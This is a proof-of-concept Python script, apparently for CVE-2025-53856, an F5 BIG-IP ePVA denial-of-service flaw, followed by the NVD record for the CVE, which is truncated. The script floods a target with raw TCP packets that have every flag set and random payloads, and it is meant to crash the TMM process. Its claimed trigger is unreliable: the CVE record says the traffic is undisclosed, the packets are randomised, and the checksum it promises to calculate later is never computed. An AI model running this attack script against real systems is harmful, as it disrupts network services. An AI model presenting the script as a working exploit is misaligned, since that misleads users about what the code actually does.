CVE-2025-53856

# CVE-2025-53856 PoC - F5 BIG-IP ePVA DoS # Vulnerability: Undisclosed traffic causes TMM termination when ePVA is enabled # Affected: F5 BIG-IP platforms with ePVA chip (see K12837) # CVSS: 7.5 (HIGH) - AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H import socket import struct import random import time TARGET_HOST = "192.168.1.100" # BIG-IP virtual server IP TARGET_PORT = 443 # Target service port (e.g., HTTPS) def generate_malicious_packet(): """ Generate crafted network traffic targeting ePVA-accelerated virtual server/NAT/SNAT objects to trigger TMM termination. The specific malformed packet pattern exploits the ePVA hardware acceleration processing flaw. """ # Craft IP header ip_header = struct.pack( '!BBHHHBBH4s4s', 0x45, # Version (4) + IHL (5) 0x00, # DSCP/ECN random.randint(40, 1500), # Total length random.randint(1, 65535), # Identification 0x0000, # Flags + Fragment offset 64, # TTL 6, # Protocol (TCP) 0, # Checksum (calculated later) socket.inet_aton("10.0.0.1"), # Source IP socket.inet_aton(TARGET_HOST) # Destination IP ) # Craft TCP header with anomalous flags/options to trigger ePVA bug tcp_header = struct.pack( '!HHIIBBHHH', random.randint(1024, 65535), # Source port TARGET_PORT, # Destination port random.randint(1, 4294967295), # Sequence number random.randint(0, 4294967295), # Acknowledgment number 0xFF, # Data offset + reserved (anomalous) 0xFF, # Flags (all flags set - anomalous) 65535, # Window size (maximum) 0, # Checksum 0 # Urgent pointer ) # Malformed payload designed to confuse ePVA hardware processing payload = bytes([random.randint(0, 255) for _ in range(random.randint(1, 64))]) return ip_header + tcp_header + payload def exploit(): """ Send crafted packets to trigger TMM termination via ePVA vulnerability. """ print(f"[*] Targeting F5 BIG-IP at {TARGET_HOST}:{TARGET_PORT}") print("[*] CVE-2025-53856 - ePVA DoS Exploit") sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP) sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) try: for i in range(100): packet = generate_malicious_packet() sock.sendto(packet, (TARGET_HOST, 0)) print(f"[+] Sent crafted packet {i+1}/100") time.sleep(0.01) print("[!] Exploit completed - check if TMM has terminated") except PermissionError: print("[-] Need root/admin privileges for raw sockets") finally: sock.close() if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2025-53856", "sourceIdentifier": "[email protected]", "published": "2025-10-15T14:15:48.600", "lastModified": "2025-10-21T20:19:02.110", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "When a virtual server, network address translation (NAT) object, or secure network address translation (SNAT) object uses the embedded Packet Velocity Acceleration (ePVA) feature, undisclosed traffic can cause the Traffic Management Microkernel (TMM) to terminate.  To determine which BIG-IP platforms have an ePVA chip refer to K12837: Overview of the ePVA feature https://my.f5.com/manage/s/article/K12837 .  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-705"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "A7A0C1CA-EDEF-463F-B7C8-8B9E67239FC1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "6538FBFE-AE3F-41DC-BE48-8A2444DE1F39"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "8CDAF78A-6C2B-4640-93DD-524A0D9D80CE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "4BEC05AA-EB63-4A34-94E8-81606329BA75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "F3007970-0661-4CAC-91A6-363396ED3B41"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "2450DC77-B46C-4886-AC9A-CF78B1EC4F06"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_application_visibility_and_reporting:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "D8BC9B56-DC91-4312-9A37-0892E1DCC97D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_automation_toolchain:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "B5C25C2C-608A-432F-B49C-CED71150801C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_carrier-grade_nat:*:*:*:*:*:*:* ... (truncated)